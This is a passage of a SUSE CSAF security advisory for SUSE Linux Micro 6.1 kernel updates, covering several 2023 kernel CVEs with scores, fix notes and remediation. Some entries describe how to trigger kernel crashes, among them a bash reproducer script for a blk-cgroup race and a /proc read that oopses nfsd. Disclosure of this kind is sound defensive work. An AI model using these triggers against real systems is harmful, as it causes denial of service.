"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54267",
"url": "https://www.suse.com/security/cve/CVE-2023-54267"
},
{
"category": "external",
"summary": "SUSE Bug 1255899 for CVE-2023-54267",
"url": "https://bugzilla.suse.com/1255899"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 0,
"baseSeverity": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54267"
},
{
"cve": "CVE-2023-54271",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54271"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-cgroup: Fix NULL deref caused by blkg_policy_data being installed before init\n\nblk-iocost sometimes causes the following crash:\n\n BUG: kernel NULL pointer dereference, address: 00000000000000e0\n ...\n RIP: 0010:_raw_spin_lock+0x17/0x30\n Code: be 01 02 00 00 e8 79 38 39 ff 31 d2 89 d0 5d c3 0f 1f 00 0f 1f 44 00 00 55 48 89 e5 65 ff 05 48 d0 34 7e b9 01 00 00 00 31 c0 \u003cf0\u003e 0f b1 0f 75 02 5d c3 89 c6 e8 ea 04 00 00 5d c3 0f 1f 84 00 00\n RSP: 0018:ffffc900023b3d40 EFLAGS: 00010046\n RAX: 0000000000000000 RBX: 00000000000000e0 RCX: 0000000000000001\n RDX: ffffc900023b3d20 RSI: ffffc900023b3cf0 RDI: 00000000000000e0\n RBP: ffffc900023b3d40 R08: ffffc900023b3c10 R09: 0000000000000003\n R10: 0000000000000064 R11: 000000000000000a R12: ffff888102337000\n R13: fffffffffffffff2 R14: ffff88810af408c8 R15: ffff8881070c3600\n FS: 00007faaaf364fc0(0000) GS:ffff88842fdc0000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 00000000000000e0 CR3: 00000001097b1000 CR4: 0000000000350ea0\n Call Trace:\n \u003cTASK\u003e\n ioc_weight_write+0x13d/0x410\n cgroup_file_write+0x7a/0x130\n kernfs_fop_write_iter+0xf5/0x170\n vfs_write+0x298/0x370\n ksys_write+0x5f/0xb0\n __x64_sys_write+0x1b/0x20\n do_syscall_64+0x3d/0x80\n entry_SYSCALL_64_after_hwframe+0x46/0xb0\n\nThis happens because iocg-\u003eioc is NULL. The field is initialized by\nioc_pd_init() and never cleared. The NULL deref is caused by\nblkcg_activate_policy() installing blkg_policy_data before initializing it.\n\nblkcg_activate_policy() was doing the following:\n\n1. Allocate pd\u0027s for all existing blkg\u0027s and install them in blkg-\u003epd[].\n2. Initialize all pd\u0027s.\n3. Online all pd\u0027s.\n\nblkcg_activate_policy() only grabs the queue_lock and may release and\nre-acquire the lock as allocation may need to sleep. ioc_weight_write()\ngrabs blkcg-\u003elock and iterates all its blkg\u0027s. The two can race and if\nioc_weight_write() runs during #1 or between #1 and #2, it can encounter a\npd which is not initialized yet, leading to crash.\n\nThe crash can be reproduced with the following script:\n\n #!/bin/bash\n\n echo +io \u003e /sys/fs/cgroup/cgroup.subtree_control\n systemd-run --unit touch-sda --scope dd if=/dev/sda of=/dev/null bs=1M count=1 iflag=direct\n echo 100 \u003e /sys/fs/cgroup/system.slice/io.weight\n bash -c \"echo \u00278:0 enable=1\u0027 \u003e /sys/fs/cgroup/io.cost.qos\" \u0026\n sleep .2\n echo 100 \u003e /sys/fs/cgroup/system.slice/io.weight\n\nwith the following patch applied:\n\n\u003e diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c\n\u003e index fc49be622e05..38d671d5e10c 100644\n\u003e --- a/block/blk-cgroup.c\n\u003e +++ b/block/blk-cgroup.c\n\u003e @@ -1553,6 +1553,12 @@ int blkcg_activate_policy(struct gendisk *disk, const struct blkcg_policy *pol)\n\u003e \t\tpd-\u003eonline = false;\n\u003e \t}\n\u003e\n\u003e + if (system_state == SYSTEM_RUNNING) {\n\u003e + spin_unlock_irq(\u0026q-\u003equeue_lock);\n\u003e + ssleep(1);\n\u003e + spin_lock_irq(\u0026q-\u003equeue_lock);\n\u003e + }\n\u003e +\n\u003e \t/* all allocated, init in the same order */\n\u003e \tif (pol-\u003epd_init_fn)\n\u003e \t\tlist_for_each_entry_reverse(blkg, \u0026q-\u003eblkg_list, q_node)\n\nI don\u0027t see a reason why all pd\u0027s should be allocated, initialized and\nonlined together. The only ordering requirement is that parent blkgs to be\ninitialized and onlined before children, which is guaranteed from the\nwalking order. Let\u0027s fix the bug by allocating, initializing and onlining pd\nfor each blkg and holding blkcg-\u003elock over initialization and onlining. This\nensures that an installed blkg is always fully initialized and onlined\nremoving the the race window.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54271",
"url": "https://www.suse.com/security/cve/CVE-2023-54271"
},
{
"category": "external",
"summary": "SUSE Bug 1255902 for CVE-2023-54271",
"url": "https://bugzilla.suse.com/1255902"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54271"
},
{
"cve": "CVE-2023-54276",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54276"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfsd: move init of percpu reply_cache_stats counters back to nfsd_init_net\n\nCommit f5f9d4a314da (\"nfsd: move reply cache initialization into nfsd\nstartup\") moved the initialization of the reply cache into nfsd startup,\nbut didn\u0027t account for the stats counters, which can be accessed before\nnfsd is ever started. The result can be a NULL pointer dereference when\nsomeone accesses /proc/fs/nfsd/reply_cache_stats while nfsd is still\nshut down.\n\nThis is a regression and a user-triggerable oops in the right situation:\n\n- non-x86_64 arch\n- /proc/fs/nfsd is mounted in the namespace\n- nfsd is not started in the namespace\n- unprivileged user calls \"cat /proc/fs/nfsd/reply_cache_stats\"\n\nAlthough this is easy to trigger on some arches (like aarch64), on\nx86_64, calling this_cpu_ptr(NULL) evidently returns a pointer to the\nfixed_percpu_data. That struct looks just enough like a newly\ninitialized percpu var to allow nfsd_reply_cache_stats_show to access\nit without Oopsing.\n\nMove the initialization of the per-net+per-cpu reply-cache counters\nback into nfsd_init_net, while leaving the rest of the reply cache\nallocations to be done at nfsd startup time.\n\nKudos to Eirik who did most of the legwork to track this down.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54276",
"url": "https://www.suse.com/security/cve/CVE-2023-54276"
},
{
"category": "external",
"summary": "SUSE Bug 1255907 for CVE-2023-54276",
"url": "https://bugzilla.suse.com/1255907"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54276"
},
{
"cve": "CVE-2023-54278",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54278"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/vmem: split pages when debug pagealloc is enabled\n\nSince commit bb1520d581a3 (\"s390/mm: start kernel with DAT enabled\")\nthe kernel crashes early during boot when debug pagealloc is enabled:\n\nmem auto-init: stack:off, heap alloc:off, heap free:off\naddressing exception: 0005 ilc:2 [#1] SMP DEBUG_PAGEALLOC\nModules linked in:\nCPU: 0 PID: 0 Comm: swapper Not tainted 6.5.0-rc3-09759-gc5666c912155 #630\n[..]\nKrnl Code: 00000000001325f6: ec5600248064 cgrj %r5,%r6,8,000000000013263e\n 00000000001325fc: eb880002000c srlg %r8,%r8,2\n #0000000000132602: b2210051 ipte %r5,%r1,%r0,0\n \u003e0000000000132606: b90400d1 lgr %r13,%r1\n 000000000013260a: 41605008 la %r6,8(%r5)\n 000000000013260e: a7db1000 aghi %r13,4096\n 0000000000132612: b221006d ipte %r6,%r13,%r0,0\n 0000000000132616: e3d0d0000171 lay %r13,4096(%r13)\n\nCall Trace:\n __kernel_map_pages+0x14e/0x320\n __free_pages_ok+0x23a/0x5a8)\n free_low_memory_core_early+0x214/0x2c8\n memblock_free_all+0x28/0x58\n mem_init+0xb6/0x228\n mm_core_init+0xb6/0x3b0\n start_kernel+0x1d2/0x5a8\n startup_continue+0x36/0x40\nKernel panic - not syncing: Fatal exception: panic_on_oops\n\nThis is caused by using large mappings on machines with EDAT1/EDAT2. Add\nthe code to split the mappings into 4k pages if debug pagealloc is enabled\nby CONFIG_DEBUG_PAGEALLOC_ENABLE_DEFAULT or the debug_pagealloc kernel\ncommand line option.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54278",
"url": "https://www.suse.com/security/cve/CVE-2023-54278"
},
{
"category": "external",
"summary": "SUSE Bug 1255911 for CVE-2023-54278",
"url": "https://bugzilla.suse.com/1255911"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54278"
},
{
"cve": "CVE-2023-54281",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54281"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: release path before inode lookup during the ino lookup ioctl\n\nDuring the ino lookup ioctl we can end up calling btrfs_iget() to get an\ninode reference while we are holding on a root\u0027s btree. If btrfs_iget()\nneeds to lookup the inode from the root\u0027s btree, because it\u0027s not\ncurrently loaded in memory, then it will need to lock another or the\nsame path in the same root btree. This may result in a deadlock and\ntrigger the following lockdep splat:\n\n WARNING: possible circular locking dependency detected\n 6.5.0-rc7-syzkaller-00004-gf7757129e3de #0 Not tainted\n ------------------------------------------------------\n syz-executor277/5012 is trying to acquire lock:\n ffff88802df41710 (btrfs-tree-01){++++}-{3:3}, at: __btrfs_tree_read_lock+0x2f/0x220 fs/btrfs/locking.c:136\n\n but task is already holding lock:\n ffff88802df418e8 (btrfs-tree-00){++++}-{3:3}, at: __btrfs_tree_read_lock+0x2f/0x220 fs/btrfs/locking.c:136\n\n which lock already depends on the new lock.\n\n the existing dependency chain (in reverse order) is:\n\n -\u003e #1 (btrfs-tree-00){++++}-{3:3}:\n down_read_nested+0x49/0x2f0 kernel/locking/rwsem.c:1645\n __btrfs_tree_read_lock+0x2f/0x220 fs/btrfs/locking.c:136\n btrfs_search_slot+0x13a4/0x2f80 fs/btrfs/ctree.c:2302\n btrfs_init_root_free_objectid+0x148/0x320 fs/btrfs/disk-io.c:4955\n btrfs_init_fs_root fs/btrfs/disk-io.c:1128 [inline]\n btrfs_get_root_ref+0x5ae/0xae0 fs/btrfs/disk-io.c:1338\n btrfs_get_fs_root fs/btrfs/disk-io.c:1390 [inline]\n open_ctree+0x29c8/0x3030 fs/btrfs/disk-io.c:3494\n btrfs_fill_super+0x1c7/0x2f0 fs/btrfs/super.c:1154\n btrfs_mount_root+0x7e0/0x910 fs/btrfs/super.c:1519\n legacy_get_tree+0xef/0x190 fs/fs_context.c:611\n vfs_get_tree+0x8c/0x270 fs/super.c:1519\n fc_mount fs/namespace.c:1112 [inline]\n vfs_kern_mount+0xbc/0x150 fs/namespace.c:1142\n btrfs_mount+0x39f/0xb50 fs/btrfs/super.c:1579\n legacy_get_tree+0xef/0x190 fs/fs_context.c:611\n vfs_get_tree+0x8c/0x270 fs/super.c:1519\n do_new_mount+0x28f/0xae0 fs/namespace.c:3335\n do_mount fs/namespace.c:3675 [inline]\n __do_sys_mount fs/namespace.c:3884 [inline]\n __se_sys_mount+0x2d9/0x3c0 fs/namespace.c:3861\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\n -\u003e #0 (btrfs-tree-01){++++}-{3:3}:\n check_prev_add kernel/locking/lockdep.c:3142 [inline]\n check_prevs_add kernel/locking/lockdep.c:3261 [inline]\n validate_chain kernel/locking/lockdep.c:3876 [inline]\n __lock_acquire+0x39ff/0x7f70 kernel/locking/lockdep.c:5144\n lock_acquire+0x1e3/0x520 kernel/locking/lockdep.c:5761\n down_read_nested+0x49/0x2f0 kernel/locking/rwsem.c:1645\n __btrfs_tree_read_lock+0x2f/0x220 fs/btrfs/locking.c:136\n btrfs_tree_read_lock fs/btrfs/locking.c:142 [inline]\n btrfs_read_lock_root_node+0x292/0x3c0 